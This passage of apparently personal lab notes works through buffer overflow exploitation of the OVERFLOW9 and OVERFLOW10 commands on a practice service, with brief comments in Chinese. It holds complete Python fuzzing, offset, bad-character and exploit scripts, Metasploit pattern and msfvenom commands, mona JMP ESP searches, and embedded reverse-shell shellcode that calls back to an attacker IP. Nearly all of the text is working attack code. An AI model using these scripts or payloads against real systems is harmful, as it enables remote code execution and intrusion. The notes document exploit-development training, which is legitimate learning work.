\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe0\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\x04\x3e\x3f\xe1之后\x05\xe2不受影响

BADCHAR: \x00\x04\x3e\x3f\xe1

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\x04\x3e\x3f\xe1"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\x04\x3e\x3f\xe1" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW9 "
offset = 1514
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\xdb\xd9\xd9\x74\x24\xf4\xb8\x21\x43\x4a\x13\x5b\x31\xc9\xb1\x52\x31\x43\x17\x03\x43\x17\x83\xca\xbf\xa8\xe6\xf0\xa8\xaf\x09\x08\x29\xd0\x80\xed\x18\xd0\xf7\x66\x0a\xe0\x7c\x2a\xa7\x8b\xd1\xde\x3c\xf9\xfd\xd1\xf5\xb4\xdb\xdc\x06\xe4\x18\x7f\x85\xf7\x4c\x5f\xb4\x37\x81\x9e\xf1\x2a\x68\xf2\xaa\x21\xdf\xe2\xdf\x7c\xdc\x89\xac\x91\x64\x6e\x64\x93\x45\x21\xfe\xca\x45\xc0\xd3\x66\xcc\xda\x30\x42\x86\x51\x82\x38\x19\xb3\xda\xc1\xb6\xfa\xd2\x33\xc6\x3b\xd4\xab\xbd\x35\x26\x51\xc6\x82\x54\x8d\x43\x10\xfe\x46\xf3\xfc\xfe\x8b\x62\x77\x0c\x67\xe0\xdf\x11\x76\x25\x54\x2d\xf3\xc8\xba\xa7\x47\xef\x1e\xe3\x1c\x8e\x07\x49\xf2\xaf\x57\x32\xab\x15\x1c\xdf\xb8\x27\x7f\x88\x0d\x0a\x7f\x48\x1a\x1d\x0c\x7a\x85\xb5\x9a\x36\x4e\x10\x5d\x38\x65\xe4\xf1\xc7\x86\x15\xd8\x03\xd2\x45\x72\xa5\x5b\x0e\x82\x4a\x8e\x81\xd2\xe4\x61\x62\x82\x44\xd2\x0a\xc8\x4a\x0d\x2a\xf3\x80\x26\xc1\x0e\x43\x43\x07\x3a\xf3\x3b\x25\x3a\xf6\x82\xa0\xdc\x92\xe4\xe4\x77\x0b\x9c\xac\x03\xaa\x61\x7b\x6e\xec\xea\x88\x8f\xa3\x1a\xe4\x83\x54\xeb\xb3\xf9\xf3\xf4\x69\x95\x98\x67\xf6\x65\xd6\x9b\xa1\x32\xbf\x6a\xb8\xd6\x2d\xd4\x12\xc4\xaf\x80\x5d\x4c\x74\x71\x63\x4d\xf9\xcd\x47\x5d\xc7\xce\xc3\x09\x97\x98\x9d\xe7\x51\x73\x6c\x51\x08\x28\x26\x35\xcd\x02\xf9\x43\xd2\x4e\x8f\xab\x63\x27\xd6\xd4\x4c\xaf\xde\xad\xb0\x4f\x20\x64\x71\x7f\x6b\x24\xd0\xe8\x32\xbd\x60\x75\xc5\x68\xa6\x80\x46\x98\x57\x77\x56\xe9\x52\x33\xd0\x02\x2f\x2c\xb5\x24\x9c\x4d\x9c"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

OVERFLOW10

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW10 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 600 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW10 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 41397241 -> A9rA -> Ar9A

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q Ar9A -l 600

[*] Exact match at offset 537

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW10 "
offset = 537
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW10 "
offset = 537
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\xa0\xa1\xad\xae\xbe\xbf\xde\xdf\xef\xf0

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW10 "
offset = 537
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\xa0\xad\xbe\xde\xef之后\xa1\xae\xbf\xdf\xf0不受影响

BADCHAR: \x00\xa0\xad\xbe\xde\xef

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\xa0\xad\xbe\xde\xef"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\xa0\xad\xbe\xde\xef" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW10 "
offset = 537
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xc4\xab\x18\x83\x83\xee\xfc\xe2\xf4\x38\x43\x9a\x83\xc4\xab\x78\x0a\x21\x9a\xd8\xe7\x4f\xfb\x28\x08\x96\xa7\x93\xd1\xd0\x20\x6a\xab\xcb\x1c\x52\xa5\xf5\x54\xb4\xbf\xa5\xd7\x1a\xaf\xe4\x6a\xd7\x8e\xc5\x6c\xfa\x71\x96\xfc\x93\xd1\xd4\x20\x52\xbf\x4f\xe7\x09\xfb\x27\xe3\x19\x52\x95\x20\x41\xa3\xc5\x78\x93\xca\xdc\x48\x22\xca\x4f\x9f\x93\x82\x12\x9a\xe7\x2f\x05\x64\x15\x82\x03\x93\xf8\xf6\x32\xa8\x65\x7b\xff\xd6\x3c\xf6\x20\xf3\x93\xdb\xe0\xaa\xcb\xe5\x4f\xa7\x53\x08\x9c\xb7\x19\x50\x4f\xaf\x93\x82\x14\x22\x5c\xa7\xe0\xf0\x43\xe2\x9d\xf1\x49\x7c\x24\xf4\x47\xd9\x4f\xb9\xf3\x0e\x99\xc3\x2b\xb1\xc4\xab\x70\xf4\xb7\x99\x47\xd7\xac\xe7\x6f\xa5\xc3\x54\xcd\x3b\x54\xaa\x18\x83\xed\x6f\x4c\xd3\xac\x82\x98\xe8\xc4\x54\xcd\xd3\x94\xfb\x48\xc3\x94\xeb\x48\xeb\x2e\xa4\xc7\x63\x3b\x7e\x8f\xe9\xc1\xc3\x12\x92\xee\xcb\x70\x81\xc4\xae\x21\x0a\x22\xc1\x08\xd5\x93\xc3\x81\x26\xb0\xca\xe7\x56\x41\x6b\x6c\x8f\x3b\xe5\x10\xf6\x28\xc3\xe8\x36\x66\xfd\xe7\x56\xac\xc8\x75\xe7\xc4\x22\xfb\xd4\x93\xfc\x29\x75\xae\xb9\x41\xd5\x26\x56\x7e\x44\x80\x8f\x24\x82\xc5\x26\x5c\xa7\xd4\x6d\x18\xc7\x90\xfb\x4e\xd5\x92\xed\x4e\xcd\x92\xfd\x4b\xd5\xac\xd2\xd4\xbc\x42\x54\xcd\x0a\x24\xe5\x4e\xc5\x3b\x9b\x70\x8b\x43\xb6\x78\x7c\x11\x10\xe8\x36\x66\xfd\x70\x25\x51\x16\x85\x7c\x11\x97\x1e\xff\xce\x2b\xe3\x63\xb1\xae\xa3\xc4\xd7\xd9\x77\xe9\xc4\xf8\xe7\x56"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")